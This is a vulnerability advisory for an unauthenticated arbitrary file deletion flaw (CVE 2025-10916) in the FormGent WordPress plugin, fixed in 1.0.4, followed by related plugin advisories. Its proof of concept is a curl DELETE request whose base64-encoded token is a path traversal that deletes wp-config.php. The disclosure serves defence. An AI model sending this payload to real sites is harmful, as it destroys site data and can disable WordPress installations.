FormGent < 1.0.4 – Unauthenticated Arbitrary File Deletion | CVE 2025-10916 | Plugin Vulnerabilities

Description

The plugin is vulnerable to arbitrary file deletion due to insufficient file path validation. This makes it possible for unauthenticated attackers to delete arbitrary files on the server.

Proof of Concept

```
curl -i -X DELETE \
  'http://example.com/wp-json/formgent/responses/attachments' \
  -H 'Content-Type: application/json' \
  --data '{"file_token":"Li4vLi4vLi4vd3AtY29uZmlnLnBocA=="}'
```

This payload deletes `../../../wp-config.php` relative to the `wp-content/uploads/` directory. A successful exploit returns HTTP 204 No Content.

Affects Plugins

Fixed in 1.0.4

References

CVE

Classification

Type

FILE DELETION

OWASP top 10

A6: Security Misconfiguration

CWE

CVSS

Miscellaneous

Original Researcher

Khaled Alenazi (Nxploited)

Submitter

Khaled Alenazi (Nxploited)

Verified

Yes

WPVDB ID

81c23998-1abb-495f-890a-79624a4cab9a

Timeline

Publicly Published

2025-09-30 (about 2 months ago)

Added

2025-09-30 (about 2 months ago)

Last Updated

2025-09-30 (about 2 months ago)

Other

Published

Title

Published

2020-10-07

Title

HyperComments <= 1.2.2 - Unauthenticated Arbitrary File Deletion

Published

2024-09-10

Title

WP Delicious – Recipe Plugin for Food Bloggers (formerly Delicious Recipes) < 1.7.0 - Improper Path Validation to Authenticated (Subscriber+) Arbitrary File Move and Read

Published

2025-10-02

Title

Backup Bolt < 1.5.0 - Authenticated (Admin+) Arbitrary File Download

Published

2025-12-05

Title

10Web Booster < 2.32.11 - Subscriber+ Arbitrary Folder Deletion

Published

2025-11-20

Title

WP AUDIO GALLERY <= 2.0 - Authenticated (Subscriber+) Arbitrary File Deletion via 'audio_upload' Parameter